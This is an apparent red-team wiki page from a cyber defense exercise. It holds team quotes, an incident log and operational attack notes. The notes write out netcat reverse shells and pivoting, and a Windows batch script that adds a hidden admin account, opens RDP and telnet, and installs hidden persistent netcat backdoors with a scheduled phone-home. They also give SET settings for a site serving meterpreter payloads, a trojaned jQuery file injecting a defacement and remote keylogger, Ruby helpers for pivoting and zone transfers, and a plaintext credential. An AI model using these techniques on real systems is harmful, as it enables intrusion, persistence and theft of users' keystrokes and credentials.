CDX-RC-Docs
Feel free to pull this doc to add, update, correct it
s#!t hackers say
-
whack back doublebackwhack - n00bfac3
-
I’m touching it the wrong way - moose
-
every cloud has a cyber lining - bryfry
-
I’m taking an fgdump all over this - dub
-
It’s Mudge’s little thing keeping us in there! - dub
-
I cannot have enough shells right now, it’s ridiculous! Shells on shells on shells! Shells gone wild! - moose
-
I cacl’d it up in there! - n00bfac3
-
dub: The G-Spot is going to be beaconing
bryfry: You should come up with another word for beaconing.
-
You just dumped your own hashes - d1
-
It’s very very hung - dub
-
21:45:45 <Mr.T> I tty the foo -
Yeah, you can’t control-C… - moose
-
It wasn’t a stupid question–it’s the middle of the night…literally! - n00bfac3
-
The question is NO - moose
-
hash-bang explana-brag! - bryfry
-
I’m going to insert the trojan in the box, drop my payload, and spawn so many child processes - mstaint
Bad Red Cell Hat Log
- Rookie4U scanned from armitage server.
- Rookie4U scanned from armitage server again.
- and again.
- Mudge egressed on 21
- p0nyExpr3ss exploited from armitage server
- bryfry posted red team SSH keys to public drop box
- (honorary) Cmdr Odom grabbed passwd/shadow … of local machine (GET FTW)
Media
Screenshots & Photos: http://goo.gl/MVeB3
Armitage
Client Setup
- Host: <armitage server ip>
- Port: 55553
- User: msf
- Pass: <password>
Server Setup
# get the teamserver startup script that doesn't ship with bt5 rc2
cd /opt/metasploit/msf3/data/armitage
wget http://armitage.googlecode.com/svn-history/r737/trunk/release/armitage-unix/teamserver
chmod a+x teamserver
# start the server
./teamserver <external ip> <password>
NetCat
Server (listener, on the attacker box; -k keeps listening after a client disconnects, -m 1 allows one connection at a time):
ncat <ip> <port> -klvm 1
Client (on the target; hands a bash to the listener, backgrounded with its output silenced; -e needs a traditional nc build, the OpenBSD nc does not have it):
nc <server ip> <port> -e /bin/bash 1>/dev/null 2>/dev/null &
Upgrade from nc shell to terminal-ish (needs python on the target):
python -c 'import pty; pty.spawn("/bin/sh")'
nc Pivoting with Named Pipes
### Setup ###
+-----------------+ +----------------+ +----------------+
| attacker | | nc pivot | | target |
|-----------------| |----------------| |----------------|
| | | | | |
| attacker net |<-------| target net | | target net |
| | nc | | | |
+-----------------+ +----------------+ +----------------+
### Execute ###
nc pivot $ mknod x p
+-----+ $ nc <attacker ip> 443 < x | nc <target ip> 445 > x
| msf |
+-----+ attacker $ mknod y p
| $ nc -klp 443 < y | nc -klp 1234 > y
v
+-----------------+ +----------------+ +----------------+
| | attacker | | nc pivot | | target |
|-----------------| |----------------| |----------------|
| | | | | | |
| | +->|<------>|-----> x ------>|-------->| :( |
| v | | | | | |
+--------------+--+ +----------------+ +----------------+
1234 443
^ ^
| localhost |
+--> y <--+
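The two nc lines above do one thing each: the pivot connects out to both the attacker and the target and shovels bytes between the two connections, and the attacker listens for the pivot's call-back and for msf and shovels between those. The following is an added example, not part of these notes, that does the same splice with sockets so the direction of each connection and the EOF handling are visible. Hosts and ports (127.0.0.1, 14443 for the call-back, 11234 for msf, 14445 for the "target") are constructed for a local run; the upper-casing echo service stands in for whatever really sits on the target's 445.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original notes): the nc named-pipe pivot done
# with sockets. All addresses/ports are constructed for a localhost demo.
require 'socket'

# Copy bytes src -> dst until src hits EOF, then shut dst's write half so
# the far end sees EOF too. The fifo + shell pipe give nc exactly this.
def pump(src, dst)
  IO.copy_stream(src, dst)
rescue IOError, Errno::ECONNRESET, Errno::EPIPE
ensure
  dst.close_write rescue nil
end

# Bidirectional shovel between two sockets; returns when both sides are done.
def splice(a, b)
  t1 = Thread.new { pump(a, b) }
  t2 = Thread.new { pump(b, a) }
  [t1, t2].each(&:join)
  [a, b].each { |s| s.close rescue nil }
end

# Pivot box line:  nc <attacker ip> 443 < x | nc <target ip> 445 > x
# Both legs are outbound from the pivot, which is why only egress is needed.
def pivot_line(attacker_host, attacker_port, target_host, target_port)
  Thread.new do
    to_attacker = TCPSocket.new(attacker_host, attacker_port)
    to_target   = TCPSocket.new(target_host, target_port)
    splice(to_attacker, to_target)
  end
end

# Attacker box line:  nc -klp 443 < y | nc -klp 1234 > y
# Wait for the pivot on callback_port and for msf on local_port, then splice.
def attacker_line(callback_port, local_port, bind_addr = '127.0.0.1')
  callback_srv = TCPServer.new(bind_addr, callback_port)
  local_srv    = TCPServer.new(bind_addr, local_port)
  Thread.new do
    from_pivot = callback_srv.accept
    callback_srv.close
    from_msf = local_srv.accept
    local_srv.close
    splice(from_pivot, from_msf)
  end
end

# Stand-in for the target's service: upper-cases every line it receives.
def start_echo_target(port, bind_addr = '127.0.0.1')
  server = TCPServer.new(bind_addr, port)
  Thread.new do
    sock = server.accept
    server.close
    while (line = sock.gets)
      sock.write(line.upcase)
    end
    sock.close
  end
end

# Play msf: talk to localhost:<local_port> and return what came back via
# attacker <-> pivot <-> target.
def demo(callback_port = 14443, local_port = 11234, target_port = 14445)
  start_echo_target(target_port)
  attacker = attacker_line(callback_port, local_port)
  pivot = pivot_line('127.0.0.1', callback_port, '127.0.0.1', target_port)
  msf = TCPSocket.new('127.0.0.1', local_port)
  msf.puts 'hello through the pivot'
  reply = msf.gets
  msf.close
  [pivot, attacker].each { |t| t.join(5) }
  reply
end

puts demo if __FILE__ == $PROGRAM_NAME
```

In the real setup msf points at localhost:1234 on the attacker box, and the reply path is the same as the demo's: whatever the target answers rides back over the pivot's outbound connection to 443. Note that nothing here is encrypted or authenticated; anyone who can reach the attacker's 443 before the pivot calls in gets spliced to msf instead.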
Port Knocking to initiate nc with iptables
iptables: log the first packet (SYN) of any TCP connection to <port>. --syn keeps awk from firing on every packet of the session, and the trailing space in the prefix keeps it from running straight into the IN= field of the log line
sudo iptables -A INPUT -p tcp --syn --dport <port> -j LOG --log-prefix "token <port> "
Watch the log for the token and run the script that starts the nc connection (/sbin/netplugd-ng is your own script, not shown here). Anyone who can reach <port> triggers it, so the port number is the only secret
tail -f /var/log/messages | awk '/token <port>/ {system("/sbin/netplugd-ng <port>")}' &
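The awk one-liner fires on any line containing the token. The following is an added example, not from the original notes, that does the watcher half in Ruby with the iptables LOG format actually parsed, so only a TCP SYN to the knock port counts and the knocker's source address is handed to the callback. The token word "token", port 31337 and the log lines are constructed for the demo; in real use the input is `tail -f /var/log/messages` and the block body is whatever starts the nc connection.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original notes): parse iptables LOG lines and
# fire a callback only for SYN knocks carrying our prefix. Sample log lines
# are constructed; "token" and 31337 are assumptions.

TOKEN_PREFIX = 'token'

# Turn one kernel LOG line into a hash of its KEY=VALUE fields plus bare
# flags (SYN, ACK, DF -> true). Returns nil for lines without our prefix.
def parse_knock(line, port)
  return nil unless line.include?("#{TOKEN_PREFIX} #{port}")
  fields = {}
  # A prefix without a trailing space runs straight into IN=, so strip
  # everything up to and including the prefix and any whitespace after it.
  line.sub(/.*#{TOKEN_PREFIX} #{port}\s*/, '').split.each do |tok|
    k, v = tok.split('=', 2)
    fields[k] = v.nil? ? true : v
  end
  fields
end

# A knock is a TCP SYN to our port; mid-stream packets and RST scans are ignored.
def knock?(fields, port)
  fields && fields['PROTO'] == 'TCP' && fields['DPT'] == port.to_s && fields['SYN'] == true
end

# Scan log lines, yield each knocker's source address, return all sources seen.
def watch(lines, port)
  sources = []
  lines.each do |line|
    f = parse_knock(line, port)
    next unless knock?(f, port)
    sources << f['SRC']
    yield f['SRC'] if block_given?
  end
  sources
end

# Constructed sample: a SYN knock (prefix with no trailing space), a mid-stream
# ACK that must not fire, an unrelated sshd line, and a knock logged with a
# trailing-space prefix.
SAMPLE_LOG = <<~LOG
  Mar  3 21:45:45 pivot kernel: token 31337IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=10.1.20.5 DST=10.2.36.5 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=TCP SPT=54321 DPT=31337 WINDOW=29200 RES=0x00 SYN URGP=0
  Mar  3 21:45:45 pivot kernel: token 31337IN=eth0 OUT= SRC=10.1.20.5 DST=10.2.36.5 LEN=52 PROTO=TCP SPT=54321 DPT=31337 WINDOW=229 RES=0x00 ACK URGP=0
  Mar  3 21:46:01 pivot sshd[4242]: Accepted publickey for root from 10.1.30.5 port 40000 ssh2
  Mar  3 21:47:12 pivot kernel: token 31337 IN=eth0 OUT= SRC=10.1.40.5 DST=10.2.36.5 LEN=60 PROTO=TCP SPT=40001 DPT=31337 WINDOW=29200 RES=0x00 SYN URGP=0
LOG

if __FILE__ == $PROGRAM_NAME
  # Real use: replace SAMPLE_LOG.lines with ARGF (fed by tail -f) and put the
  # command that starts the nc connection in the block.
  watch(SAMPLE_LOG.lines, 31337) { |src| puts "knock from #{src}" }
end
```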
Windows
Change user desktop
reg add "hkcu\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
reg add "hkcu\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\[LOCATION OF WALLPAPER]" /f
reg delete "hkcu\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
reg add "hkcu\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Windows .bat runs token_util.exe
Save the following code into younameit.bat. %BACKDOOR_PORT% and %NCL% (the host the phone-home connects to) are not defined below; they are assumed to be set earlier in the .bat or in the environment.
@echo off
start "" "C:\TOKEN_AGENT\token_agent_cxfreeze\token_util.exe"
Add new user
@echo Adding new user...
net user WindowsAssistance P@ssw0rd /add
@echo Adding new user to Admin and Remote access groups...
net localgroup Administrators WindowsAssistance /add
net localgroup "Remote Desktop Users" WindowsAssistance /add
Hide user from Welcome screen
@echo Hiding new user from welcome screen...
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v WindowsAssistance /t REG_DWORD /d 0 /f
Enable RDP
@echo Enabling Remote Desktop Service and opening firewall port...
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable Telnet
@echo Enabling telnet and opening port...
sc config tlntsvr start= auto
net start telnet
netsh firewall add portopening TCP 23 Telnet
Install Persistent NetCat Listener
@echo Installing persistent netcat listener...
copy znc.exe %SYSTEMROOT%
echo znc.exe -L -p %BACKDOOR_PORT% -d -e cmd.exe > Windows-Backup.bat
copy Windows-Backup.bat "%USERPROFILE%\Start Menu\Programs\Startup"
attrib +R +H "%USERPROFILE%\Start Menu\Programs\Startup\Windows-Backup.bat"
attrib +R +H Windows-Backup.bat
netsh firewall add portopening TCP %BACKDOOR_PORT% Windows-Backup
NetCat Caller
@echo Creating phone-home task...
echo ECHO OFF > %SYSTEMROOT%\service.bat
echo znc.exe %NCL% 8080 -d -e cmd.exe >> %SYSTEMROOT%\service.bat
attrib +R +H %SYSTEMROOT%\service.bat
schtasks /create /RU WindowsAssistance /RP P@ssw0rd /SC MINUTE /MO 5 /TN Backup /TR "service.bat"
schtasks /change /tn Backup /ru ""
See Windows sessions and kill one
C:\windows\system32\dllcache\quser.exe
logoff <sessionid>
Wiggle da mouse! (kill the screensaver)
taskkill /f /im logon.scr
NET USE to an IPv6 host (ipv6-literal.net form: colons in the address become dashes)
net use X: \\2001-dbb-c18-555-f8d9-a1ea-b86e-10ad.ipv6-literal.net\SYSVOL /user:scorebot Dinosaur2
Misc. Tools / Tricks
DNS Zone Transfers
dnstz.rb
#!/usr/bin/env ruby
# Try a zone transfer (AXFR) against each blue team's DNS server and
# dump whatever it hands back; a server that refuses just makes dig
# print "; Transfer failed."
teams = [
  ['10.1.20.5','usafa.bluenet'],
  ['10.1.30.5','afit1.bluenet'],
  ['10.1.40.5','uscga.bluenet'],
  ['10.1.50.5','usmma.bluenet'],
  ['10.1.60.5','usma.bluenet'],
  ['10.1.70.5','usna.bluenet'],
  ['10.1.80.5','afit2.bluenet'],
  ['10.1.90.5','nps.bluenet'],
  ['10.1.100.5','rmc.bluenet']
]
teams.each do |ip, zone|
  # +time=1: one-second timeout so a filtered server does not stall the loop
  dump = %x[dig -t AXFR #{zone} @#{ip} +time=1]
  puts dump
end
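dnstz.rb only prints the raw dig output. The following is an added example, not part of dnstz.rb or the original notes, that parses that output into records and pulls out what a red cell actually wants from a transfer: the hosts the zone advertises, any SRV-advertised services, and a deduplicated target list. The zone, addresses and the dig transcript below are constructed for the demo and are not data from the exercise.

```ruby
#!/usr/bin/env ruby
# Added example (not from dnstz.rb): parse dig AXFR output into records.
# SAMPLE_AXFR is a constructed transcript in dig's format, not real data.

Record = Struct.new(:name, :ttl, :type, :rdata)

# dig prints ";" comment lines and blanks around the records; everything
# else is "name ttl class type rdata...". The SOA appears twice in a
# real transfer (first and last record), hence the uniq.
def parse_axfr(text)
  records = text.each_line.map do |line|
    line = line.strip
    next if line.empty? || line.start_with?(';')
    name, ttl, klass, type, *rdata = line.split
    next unless klass == 'IN' && type && !rdata.empty?
    Record.new(name.chomp('.'), ttl.to_i, type, rdata.join(' '))
  end
  records.compact.uniq
end

# dig prints "; Transfer failed." (and no records) when the server refuses AXFR.
def transfer_failed?(text)
  text.include?('Transfer failed.') || parse_axfr(text).empty?
end

# name => IPv4 for every A record: the hosts the zone owner told us about.
def host_map(records)
  records.select { |r| r.type == 'A' }.map { |r| [r.name, r.rdata] }.to_h
end

# Services advertised via SRV as [name, port, target] triples (e.g. LDAP on a DC).
def services(records)
  records.select { |r| r.type == 'SRV' }.map do |r|
    _prio, _weight, port, target = r.rdata.split
    [r.name, port.to_i, target.chomp('.')]
  end
end

# Unique target addresses sorted numerically, ready for nmap -iL.
def target_list(records)
  host_map(records).values.uniq.sort_by { |ip| ip.split('.').map(&:to_i) }
end

SAMPLE_AXFR = <<~DIG
  ; <<>> DiG 9.7.0 <<>> -t AXFR example.bluenet @10.9.9.5 +time=1
  ;; global options: +cmd
  example.bluenet.            3600 IN SOA ns.example.bluenet. admin.example.bluenet. 2012041001 3600 900 604800 86400
  example.bluenet.            3600 IN NS  ns.example.bluenet.
  ns.example.bluenet.         3600 IN A   10.9.9.5
  www.example.bluenet.        3600 IN A   10.9.9.10
  mail.example.bluenet.       3600 IN A   10.9.9.20
  example.bluenet.            3600 IN MX  10 mail.example.bluenet.
  dc1.example.bluenet.        3600 IN A   10.9.9.30
  www2.example.bluenet.       3600 IN A   10.9.9.10
  _ldap._tcp.example.bluenet. 600  IN SRV 0 100 389 dc1.example.bluenet.
  example.bluenet.            3600 IN SOA ns.example.bluenet. admin.example.bluenet. 2012041001 3600 900 604800 86400
  ;; Query time: 3 msec
  ;; SERVER: 10.9.9.5#53(10.9.9.5)
  ;; XFR size: 10 records (messages 1, bytes 340)
DIG

if __FILE__ == $PROGRAM_NAME
  recs = parse_axfr(SAMPLE_AXFR)
  puts target_list(recs)
  services(recs).each { |name, port, target| puts "#{name} -> #{target}:#{port}" }
end
```

To use it with dnstz.rb, feed each `dump` string to parse_axfr instead of printing it; a team whose server refuses the transfer shows up as transfer_failed? and is simply not in the target list.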
Wireshark of Remote Host
This runs tcpdump on a remote host (-U flushes each packet, -s0 captures full packets), streams the pcap back over ssh, and opens it live in a local Wireshark. 'not port 22' keeps the ssh session itself out of the capture.
ssh <user>@<remote ip> tcpdump -U -s0 -w - 'not port 22' | wireshark -k -i -
Create a malware serving website with SET
cd /pentest/exploit/set
edit /pentest/exploit/set/config/set_config and set:
METERPRETER_MULTI_SCRIPT=ON
METERPRETER_MULTI_COMMANDS= run persistence -r 10.2.222.222 -p 443 -P windows/meterpreter/reverse_https -i 5 -X -A -U
AUTO_DETECT=ON
APACHE_SERVER=ON
APACHE_DIRECTORY=/var/www
SELF_SIGNED_APPLET=ON
JAVA_ID_PARAM=Secure CDX Java App #or whatever you want
AUTOMATIC_LISTENER=ON
Start SET with ./set and walk the menus:
1) Social-Engineering Attacks
2) Website Attack Vectors
1) Java Applet Attack Method
Clone or Template
Input your web server external IP
9) Windows Meterpreter Reverse HTTPS
16) Backdoored Executable
Default listener port [443]
Get a DNS entry created for your website
Sit back and wait patiently
USAFA Website Defacement / Keylogger
The open door (the site loads jQuery from an external host):
<script type="text/javascript" src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
The site defacement (the first line is the end of jquery-1.7.1.min.js, shown to mark where the payload was appended):
define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return f})})(window);
jQuery(document).ready(function() { jQuery("td a img").first().attr("src", "http://www.whitehouse.com/jb7.jpg").attr("width", 128).attr("height", 200).attr("alt", "boys, this is what you're fighting for");
jQuery(".boardtitle").text("Boys, this is what you're fighting for");
The Keylogger
jQuery("body").append("<script SRC=\"http://10.2.36.5:443/analytics/test.js\"></script>"); });
js created with: msf> use auxiliary/server/capture/http_javascript_keylogger